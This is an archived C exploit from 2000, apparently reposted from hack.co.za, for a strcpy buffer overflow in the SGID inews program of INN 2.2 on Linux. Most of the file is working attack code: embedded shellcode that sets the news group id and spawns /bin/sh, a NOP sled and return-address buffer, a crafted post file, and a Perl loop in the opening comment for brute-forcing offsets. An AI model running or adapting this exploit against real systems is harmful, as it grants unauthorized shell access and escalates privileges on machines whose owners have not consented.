home *** CD-ROM | disk | FTP | other *** search
- /* (linux)inews[inn-2.2] buffer overflow, by Vade79->v9[v9@fakehalo.org].
- this will give you a gid=news shell if /usr/bin/inews is SGID(news). i know
- /usr/bin/inews comes default with versions of redhat, but i don't know about
- other distributions.
-
- cause (line601:inews.c): "(void)strcpy(from, HDR(_from));", use strncpy();
-
- note: i found this while looking for a security hole in another program that
- comes with inn, but it needs gid=news to run anyways. so this is a
- bonus. also, you may want to clean up the defined TMPFILE afterwords.
- after making this, i found another exploit of the same idea, this is
- much more functional though.
-
- the old perl script below for offset(s):
-
- #!/usr/bin/perl
- $i=$ARGV[0];
- while(1){
- print "offset: $i.\n";
- system("./inews_bof $i");
- $i+=100;
- } */
-
- #include <stdio.h>
- #define NEWSGID 13 // the group id of news.
- #define ALIGN 0 // return alignment.
- #define PATH "/usr/bin/inews" // path to the inews program.
- #define TMPFILE "/tmp/bad.post" // file to overflow inews buffer with.
- #define SUBJECT "inews bug." // required file filler.
- #define NEWSGROUP "alt.inn.bug" // required file filler.
- #define DEFAULT_OFFSET 650 // usual offset.
-
- static char exec[]=
- "\xeb\x29\x5e\x31\xc0\xb0\x2e\x31\xdb\xb3"
- "\x00" // yeah, group id of news here.
- "\xcd\x80\x89\x76\x08\x31\xc0\x88\x46\x07"
- "\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08"
- "\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40"
- "\xcd\x80\xe8\xd2\xff\xff\xff\x2f\x62\x69"
- "\x6e\x2f\x73\x68\x01"; // hex01 h00t!
-
- long esp(void)
- {
- __asm__("movl %esp,%eax");
- }
- int main(int argc,char **argv)
- {
- char bof[600]; // give or take a few. (528)
- int i,offset,gid=NEWSGID;
- long ret;
- FILE *inewsfile;
- if(argc>1)
- {
- offset=atoi(argv[1]);
- }
- else
- {
- offset=DEFAULT_OFFSET;
- }
- ret=(esp()-offset);
- for(i=ALIGN;i<600;i+=4)
- {
- *(long *)&bof[i]=ret;
- }
- exec[10]=gid;
- for(i=0;i<(600-strlen(exec)-100);i++)
- {
- *(bof+i)=0x90;
- }
- memcpy(bof+i,exec,strlen(exec));
- unlink(TMPFILE); // clean house.
- inewsfile=fopen(TMPFILE,"w");
- fprintf(inewsfile,"From: %s\n",bof); // required, woops.
- fprintf(inewsfile,"Newsgroups: %s\n",NEWSGROUP); // required.
- fprintf(inewsfile,"Subject: %s\n\n",SUBJECT); // required.
- fclose(inewsfile);
- printf("[ return address: 0x%lx, offset: %d, actual size: %d(sc=%d). ]\n",ret,offset,strlen(bof),strlen(exec));
- if(execlp(PATH,"inews","-h",TMPFILE,0))
- {
- printf("%s: failed, is %s the correct path?\n",argv[0],PATH);
- exit(-1);
- }
- }
- /* www.hack.co.za [26 June 2000]*/